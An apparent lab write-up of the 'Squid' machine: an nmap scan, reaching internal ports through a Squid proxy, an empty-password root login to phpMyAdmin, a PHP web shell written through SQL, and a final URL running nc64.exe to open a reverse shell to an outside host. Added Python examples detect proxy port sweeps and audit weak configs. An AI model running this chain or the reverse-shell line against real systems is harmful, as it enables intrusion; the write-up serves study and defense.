Squid

Nmap Scan

$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.158.189
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-11 13:32 +08
Nmap scan report for 192.168.158.189
Host is up (0.015s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3128/tcp  open  http-proxy    Squid http proxy 4.14
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/4.14
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-06-11T05:33:39
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.49 seconds

Initial Access

Enum4Linux

Null Session

Guest Session

Port 3128

There is a website running on port 3128.

Upon closer inspection, we can see that it is running Squid version 4.14.

Hidden ports behind web proxy

Next, we will try to see whether there are any hidden ports that can be reached through the proxy.

We can see that two ports are open. The next step is to visit either of those websites. First, we need to set up the proxy in the web browser before we are able to access them.
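From the defender's side, every one of these probes goes through Squid and lands in its access log, so a proxy that forwards to loopback and internal addresses leaves a clear trail. The following is an added example, not part of this writeup: it parses constructed lines in Squid's default native access.log format, flags requests the proxy forwarded to loopback or private addresses on non-web ports, and spots a client that touched many distinct internal ports in a short window. The sample log, the function names and the thresholds are all assumptions made for the example.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample lines in Squid's default "native" access.log format
# (timestamp elapsed client action/status bytes method url ident hierarchy/peer type).
# They model a client probing loopback ports through the proxy and then reaching a
# PHP page on 8080; the last line is ordinary internal browsing, kept for contrast.
SAMPLE_LOG = """\
1718084000.101     12 192.168.45.196 TCP_MISS/200 5120 GET http://example.org/ - HIER_DIRECT/93.184.216.34 text/html
1718084001.205      3 192.168.45.196 TCP_MISS/503 3500 GET http://127.0.0.1:22/ - HIER_NONE/- text/html
1718084001.310      2 192.168.45.196 TCP_MISS/503 3500 GET http://127.0.0.1:3306/ - HIER_NONE/- text/html
1718084001.420     15 192.168.45.196 TCP_MISS/200 1190 GET http://127.0.0.1:8080/ - HIER_DIRECT/127.0.0.1 text/html
1718084001.530      9 192.168.45.196 TCP_MISS/200 2210 GET http://127.0.0.1:8000/ - HIER_DIRECT/127.0.0.1 text/html
1718084002.640      2 192.168.45.196 TCP_MISS/503 3500 GET http://127.0.0.1:5985/ - HIER_NONE/- text/html
1718084100.700     20 192.168.45.196 TCP_MISS/200  640 GET http://127.0.0.1:8080/revshell.php?c=dir - HIER_DIRECT/127.0.0.1 text/html
1718084200.800     30 10.0.0.7 TCP_MISS/200 8800 GET http://intranet.example.org/ - HIER_DIRECT/10.0.0.20 text/html
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+(?P<result>\S+)\s+"
    r"(?P<bytes>\d+)\s+(?P<method>\S+)\s+(?P<url>\S+)\s+(?P<ident>\S+)\s+"
    r"(?P<hier>\S+)\s+(?P<ctype>\S+)$"
)


def parse_line(line):
    """Parse one native-format line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = float(rec["ts"])
    if rec["method"] == "CONNECT":          # CONNECT lines carry host:port, not a URL
        host, _, port = rec["url"].partition(":")
        rec["host"], rec["port"] = host, int(port or 443)
    else:
        parts = urlsplit(rec["url"])
        rec["host"] = parts.hostname
        rec["port"] = parts.port or (443 if parts.scheme == "https" else 80)
    peer = rec["hier"].split("/", 1)[-1]     # address Squid actually connected to
    rec["peer"] = None if peer == "-" else peer
    return rec


def load_records(text):
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def _as_ip(value):
    try:
        return ipaddress.ip_address(value)
    except (ValueError, TypeError):
        return None


def destination_ip(rec):
    """Prefer a literal IP in the URL, else the peer Squid resolved; None if neither is an IP."""
    for cand in (rec["host"], rec["peer"]):
        if _as_ip(cand) is not None:
            return cand
    return None


def is_internal(addr):
    ip = _as_ip(addr)
    return ip is not None and (ip.is_loopback or ip.is_private or ip.is_link_local)


def find_internal_access(records, allowed_ports=(80, 443)):
    """Requests forwarded to loopback/private addresses on ports that are not ordinary web ports."""
    hits = []
    for r in records:
        dest = destination_ip(r)
        if dest and is_internal(dest) and r["port"] not in allowed_ports:
            hits.append((r["client"], dest, r["port"], r["url"]))
    return hits


def find_port_sweeps(records, window=60.0, min_ports=4):
    """Clients that reached >= min_ports distinct internal (address, port) pairs within `window` seconds."""
    by_client = defaultdict(list)
    for r in records:
        dest = destination_ip(r)
        if dest and is_internal(dest):
            by_client[r["client"]].append((r["ts"], dest, r["port"]))
    sweeps = {}
    for client, events in by_client.items():
        events.sort()
        for i, (t0, _, _) in enumerate(events):
            targets = {(d, p) for t, d, p in events[i:] if t - t0 <= window}
            if len(targets) >= min_ports:
                sweeps[client] = max(sweeps.get(client, 0), len(targets))
    return sweeps


if __name__ == "__main__":
    recs = load_records(SAMPLE_LOG)
    for hit in find_internal_access(recs):
        print("internal service via proxy:", hit)
    for client, n in find_port_sweeps(recs).items():
        print(f"port sweep through proxy: {client} touched {n} internal targets")
```

The same logic applies to a real access.log fed through `load_records`; the thresholds are arbitrary starting points, and a proxy that is meant to serve only external sites can simply deny these destinations (Squid's stock configuration ships a `to_localhost` ACL for exactly this purpose).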

After configuring the proxy and visiting port 8080, we can see there is a website running on it.

When we go into the phpMyAdmin page, we are greeted with a login page.

We are then able to log in as root with an empty password, and are greeted with the following.

After enumerating around, we find a page where we are able to execute SQL statements.

Uploading file to do RCE

Next, we are able to upload a file to the website so that we can achieve code execution.
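Two configuration settings make this step possible: phpMyAdmin accepting a root login with an empty password, and the database server being allowed to write files into the web root from a SQL statement (in MySQL and MariaDB that is governed by `secure_file_priv`). As an added example, not taken from this writeup or from the lab, the script below audits constructed fragments of a phpMyAdmin `config.inc.php` and a MySQL/MariaDB server config, reporting the weak values beside hardened ones. The settings `AllowNoPassword`, `AllowRoot` and `secure_file_priv` are real option names; the file contents, paths and function names are assumptions.

```python
import re

# Constructed phpMyAdmin config fragments (not the lab machine's real files).
WEAK_PMA_CONFIG = """\
<?php
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['host'] = '127.0.0.1';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
"""
HARDENED_PMA_CONFIG = """\
<?php
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['host'] = '127.0.0.1';
$cfg['Servers'][$i]['AllowNoPassword'] = false;
$cfg['Servers'][$i]['AllowRoot'] = false;
"""

# Constructed MySQL/MariaDB server config fragments (placeholder paths).
WEAK_MYSQL_INI = """\
[mysqld]
datadir=C:/example/mysql/data
secure_file_priv=
"""
HARDENED_MYSQL_INI = """\
[mysqld]
datadir=C:/example/mysql/data
secure_file_priv=NULL
local_infile=0
"""


def _php_bool(text, key):
    """Return 'true'/'false' for $cfg['Servers'][$i][key], or None if the key is absent."""
    m = re.search(r"\['" + re.escape(key) + r"'\]\s*=\s*(true|false)\s*;", text, re.I)
    return m.group(1).lower() if m else None


def audit_phpmyadmin(text):
    findings = []
    if _php_bool(text, "AllowNoPassword") == "true":
        findings.append("AllowNoPassword is true: accounts with an empty password can log in through phpMyAdmin")
    if _php_bool(text, "AllowRoot") != "false":   # phpMyAdmin's default for AllowRoot is true
        findings.append("AllowRoot is not false: the database root account can log in through phpMyAdmin")
    return findings


def audit_mysql(text):
    findings = []
    m = re.search(r"^\s*secure[-_]file[-_]priv\s*=\s*(.*?)\s*$", text, re.M | re.I)
    if m is None:
        findings.append("secure_file_priv not set: the build default applies, verify it with SHOW VARIABLES")
    elif m.group(1).strip("\"'") == "":
        findings.append("secure_file_priv is empty: SELECT ... INTO OUTFILE may write anywhere the server account can")
    # A value of NULL disables file import/export entirely; a directory confines it.
    return findings


if __name__ == "__main__":
    for label, pma, ini in (("weak", WEAK_PMA_CONFIG, WEAK_MYSQL_INI),
                            ("hardened", HARDENED_PMA_CONFIG, HARDENED_MYSQL_INI)):
        print(label, audit_phpmyadmin(pma) + audit_mysql(ini) or ["no findings"])
```

Beyond these two settings, the database account phpMyAdmin uses should not be root at all, and the web server process should not have write access to its own document root, so that even an unrestricted `INTO OUTFILE` cannot drop a PHP file where it would be executed.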

Next, we just visit http://192.168.158.189:8080/revshell.php?c=dir to see whether it works, and sure enough it does.

Then we will just use curl to download nc64.exe to the web server. Finally, we will just execute the payload to get a reverse shell.

http://192.168.158.189:8080/revshell.php?c=nc64.exe%20192.168.45.196%204444%20-e%20cmd
